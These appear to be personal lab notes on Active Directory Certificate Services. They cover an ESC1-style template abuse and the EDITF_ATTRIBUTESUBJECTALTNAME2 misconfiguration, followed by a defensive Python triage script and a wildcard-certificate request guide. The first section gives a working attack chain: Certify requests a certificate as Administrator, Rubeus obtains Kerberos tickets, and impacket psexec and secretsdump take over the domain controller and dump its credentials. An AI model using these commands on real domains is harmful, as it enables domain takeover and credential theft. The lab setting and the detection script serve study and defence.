certutil stuff

certutil -getreg policy\EditFlags   (run on the CA; shows whether EDITF_ATTRIBUTESUBJECTALTNAME2 is set)

Vulnerable ADCS certs

  1. Certificate authority => Certificate templates => right click => manage => right click the "User" template and duplicate it => "Subject Name" tab: "Supply in the request". Then publish the new template (Certificate Templates => New => Certificate Template to Issue). It inherits the Client Authentication EKU from User, so whoever has Enroll rights on it can request a cert in someone else's name.
    1. certify.exe find /vulnerable
       the template is listed with
       msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
    2. .\Certify.exe request /ca:DC01.test.local\test-DC01-CA /template:Vuln-Cert /altname:Administrator

      CA Name                               : DC01.test.local\test-DC01-CA
      Template Name                         : Vuln-Cert
      
    3. copy the output (the RSA private key and the certificate, both PEM blocks) into cert.pem

    4. convert to a pfx (openssl prompts for an export password; remember it for Rubeus):
       openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

    5. get a TGT for Administrator (add /password:<export password> if the pfx is protected; the base64 ticket is printed because of /nowrap):
       .\Rubeus.exe asktgt /user:Administrator /ptt /nowrap /certificate:cert.pfx

    6. request a service ticket with it (paste the base64 TGT from step 5):
       .\Rubeus.exe asktgs /nowrap /user:Administrator /service:cifs/dc01.test.local /ticket:<base64 here>

    7. Rubeus is flaky for the rest; use impacket. Save the base64 service ticket as cifs.b64, then:
       base64 -d cifs.b64 > cifs.kirbi
       impacket-ticketConverter cifs.kirbi cifs.ccache
       export KRB5CCNAME=cifs.ccache

      1. impacket-psexec -dc-ip 192.168.179.3 -target-ip 192.168.179.3 -k -no-pass test.local/Administrator@dc01.test.local
      2. impacket-secretsdump -just-dc -dc-ip 192.168.179.3 -target-ip 192.168.179.3 -k -no-pass test.local/Administrator@dc01.test.local
      (with -k the target host in the principal must match the SPN in the ticket, cifs/dc01.test.local, so use the FQDN and keep -target-ip for the IP)
  2. Alternatively, make the CA accept a SAN from the "request attributes" of any template (run on the CA; takes effect after the CA service restarts):
       certutil -setreg policy\EditFlags +EDITF_ATTRIBUTESUBJECTALTNAME2
       net stop certsvc && net start certsvc
     After that, Certify request ... /altname:Administrator works against the stock User template as well, no cloned template needed.
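What "certify.exe find /vulnerable" is deciding in step 1, as an added Python example (not code from these notes or from Certify): the per-template conditions that make ENROLLEE_SUPPLIES_SUBJECT abusable, evaluated over constructed template attributes. The template names, flag values and the LDAP constants are assumptions for illustration; the remaining condition, which principals hold Enroll on the template, is not evaluated here.

```python
"""ESC1-style triage of AD CS certificate templates (added example).

Applies the template checks behind 'certify.exe find /vulnerable' to the
attributes of pKICertificateTemplate objects. Sample templates are
constructed; enrollment ACLs are deliberately not evaluated.
"""

# Templates live under this container in the configuration naming context.
LDAP_BASE_SUFFIX = "CN=Certificate Templates,CN=Public Key Services,CN=Services"
LDAP_FILTER = "(objectClass=pKICertificateTemplate)"
LDAP_ATTRS = ["cn", "msPKI-Certificate-Name-Flag", "msPKI-Enrollment-Flag",
              "msPKI-RA-Signature", "pKIExtendedKeyUsage"]

# msPKI-Certificate-Name-Flag bit set by "Subject Name: Supply in the request".
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001
# msPKI-Enrollment-Flag bit set by "CA certificate manager approval".
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002

# EKUs that make the issued certificate usable for Kerberos PKINIT logon.
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "2.5.29.37.0",             # Any Purpose
}


def as_u32(value):
    """AD returns these flags as signed 32-bit ints; mask to unsigned."""
    return int(value or 0) & 0xFFFFFFFF


def allows_client_auth(ekus):
    """An empty EKU list means 'any purpose', which also permits logon."""
    return not ekus or bool(AUTH_EKUS.intersection(ekus))


def esc1_reasons(template):
    """Reasons a template is ESC1-abusable, or [] if any condition fails."""
    name_flag = as_u32(template.get("msPKI-Certificate-Name-Flag"))
    enroll_flag = as_u32(template.get("msPKI-Enrollment-Flag"))
    ra_signatures = int(template.get("msPKI-RA-Signature") or 0)
    ekus = list(template.get("pKIExtendedKeyUsage") or [])

    if not name_flag & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        return []          # requester cannot choose the subject / SAN
    if enroll_flag & CT_FLAG_PEND_ALL_REQUESTS:
        return []          # a certificate manager must approve each request
    if ra_signatures > 0:
        return []          # an enrollment agent signature is required
    if not allows_client_auth(ekus):
        return []          # the cert could not be used to log on
    return [
        "msPKI-Certificate-Name-Flag has ENROLLEE_SUPPLIES_SUBJECT",
        "no manager approval required",
        "no authorized signatures required",
        "EKU permits client authentication" if ekus else "no EKU (any purpose)",
    ]


def find_esc1(templates):
    """Map template cn -> reasons for every template that passes esc1_reasons."""
    return {t["cn"]: esc1_reasons(t) for t in templates if esc1_reasons(t)}


# Constructed sample data, not read from a real CA (names/values assumed).
USER_EKUS = ["1.3.6.1.5.5.7.3.2", "1.3.6.1.4.1.311.10.3.4", "1.3.6.1.5.5.7.3.4"]
SAMPLE_TEMPLATES = [
    # the cloned User template from the notes, with "Supply in the request"
    {"cn": "Vuln-Cert", "msPKI-Certificate-Name-Flag": 1,
     "msPKI-Enrollment-Flag": 0, "msPKI-RA-Signature": 0,
     "pKIExtendedKeyUsage": USER_EKUS},
    # stock User template: subject built from AD, flag stored as a signed int
    {"cn": "User", "msPKI-Certificate-Name-Flag": -1509949440,  # 0xA6000000
     "msPKI-Enrollment-Flag": 41, "msPKI-RA-Signature": 0,
     "pKIExtendedKeyUsage": USER_EKUS},
    # supplies the subject, but Server Authentication only: no logon with it
    {"cn": "WebServerCustom", "msPKI-Certificate-Name-Flag": 1,
     "msPKI-Enrollment-Flag": 0, "msPKI-RA-Signature": 0,
     "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.1"]},
    # supplies the subject, but every request is held for manager approval
    {"cn": "ApprovedCert", "msPKI-Certificate-Name-Flag": 1,
     "msPKI-Enrollment-Flag": 2, "msPKI-RA-Signature": 0,
     "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"]},
]

if __name__ == "__main__":
    for cn, reasons in find_esc1(SAMPLE_TEMPLATES).items():
        print(cn + ": " + "; ".join(reasons))
```

Against a live domain, feed esc1_reasons the attributes returned by an LDAP search of LDAP_BASE_SUFFIX under the configuration naming context with LDAP_FILTER and LDAP_ATTRS; only Vuln-Cert passes on the sample data, which matches what step 1 expects to see from Certify.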

Wildcard Certificate

https://www.petenetlive.com/KB/Article/0001128 (password abc)

  1. mmc
  2. add certificates snap in, computer account, local computer ⇒ OK
  3. Personal ⇒ All Tasks ⇒ Advanced Operations ⇒ Create Custom Request
  4. Proceed without enrollment policy ⇒ leave the template/format defaults ⇒ on Certificate Information expand Details and click Properties
  5. General tab: friendly name *.test.local ⇒ Subject tab: Common name *.test.local; also add a DNS alternative name *.test.local, since browsers validate the SAN and ignore the CN; Private Key tab: mark the key exportable if the cert has to move to another host
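The same request without clicking through MMC, as an added example (not from these notes or the linked article): a certreq INF file that produces the wildcard CSR with the CN and the DNS SAN set. The key provider, key length, the second DNS name and the file names are assumptions.

```ini
; wildcard.inf (constructed example)
; create the request:  certreq -new wildcard.inf wildcard.req
[Version]
Signature = "$Windows NT$"

[NewRequest]
Subject = "CN=*.test.local"
FriendlyName = "*.test.local"
KeyLength = 2048
; KeySpec 1 = AT_KEYEXCHANGE, required for TLS
KeySpec = 1
; digital signature + key encipherment
KeyUsage = 0xA0
; allow the key to leave the box as a PFX
Exportable = TRUE
; computer store, matching the "computer account" snap-in above
MachineKeySet = TRUE
ProviderName = "Microsoft RSA SChannel Cryptographic Provider"
HashAlgorithm = sha256
RequestType = PKCS10

[EnhancedKeyUsageExtension]
; Server Authentication
OID = 1.3.6.1.5.5.7.3.1

[Extensions]
; Subject Alternative Name; browsers validate this, not the CN
2.5.29.17 = "{text}"
_continue_ = "dns=*.test.local&"
_continue_ = "dns=test.local"
```

Submit wildcard.req to the CA from the notes with certreq -submit -config "DC01.test.local\test-DC01-CA" wildcard.req wildcard.cer, then certreq -accept wildcard.cer binds the issued certificate to the private key in the computer store.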